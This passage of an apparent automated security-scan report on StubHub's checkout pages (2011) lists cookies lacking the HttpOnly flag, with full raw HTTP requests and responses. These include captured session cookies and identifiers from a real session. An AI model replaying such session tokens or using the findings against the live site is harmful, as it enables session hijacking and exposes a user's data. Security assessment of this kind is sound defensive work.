STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CF13009039C1103967B8D80BA34965BB; Path=/; Domain=.stubhub.com


4. Cookie without HttpOnly flag set  previous  next
There are 23 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. https://buy.stubhub.com/checkout/CheckoutSignin  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://buy.stubhub.com
Path:   /checkout/CheckoutSignin

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=B723884239C110395882C35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856496083,"l":"en","i":-1}

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:16 GMT
Server: Apache
Set-Cookie: TLTHID=CDDE81CC39C11039023392EDD8A51875; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
com-stubhub-dye: c734#4f6/checkout/CheckoutSignin@srwp01byx007.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 19928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

4.2. https://buy.stubhub.com/checkout/checkout  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://buy.stubhub.com
Path:   /checkout/checkout

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=D278406039C110390352E52D5035BF67; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:27 GMT
Server: Apache
Set-Cookie: TLTHID=D4150DD639C110390234E07390B95A9D; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
com-stubhub-dye: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 20919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

4.3. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://buy.stubhub.com
Path:   /checkout/checkoutsignin.signin.guestform

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /checkout/checkoutsignin.signin.guestform HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Origin: https://buy.stubhub.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; TLTHID=CF560F4839C1103958ADC35B4524558D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B
Content-Length: 391

t%3Aformdata=H4sIAAAAAAAAAK2PMUpDQRRFnwGrVArZgbYTC9NoFQRFDCIM1vL%2BzMv8l%2Fw%2FM8680WQzrkDcRAo79%2BACbK0s%2FMlfgWB14XI5h%2Fv6BfvPN3B9UZNZhiKanWd%2FlneharaW%2FJypscXzYyGMsaXWoKlpSeuHE9XXmXLm4F1hmxNMQnI
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:24 GMT
Server: Apache
Set-Cookie: TLTHID=D278406039C110390352E52D5035BF67; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 1801#1985/checkout/checkoutsignin.signin.guestform@srwp01byx001.stubprod.com
com-stubhub-dye: 1801#1985/checkout/checkoutsignin.signin.guestform@srwp01byx001.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Set-Cookie: STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; Domain=.stubhub.com; Path=/
Location: https://buy.stubhub.com/checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8


4.4. https://buy.stubhub.com/help/services/popUp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://buy.stubhub.com
Path:   /help/services/popUp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/services/popUp HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; 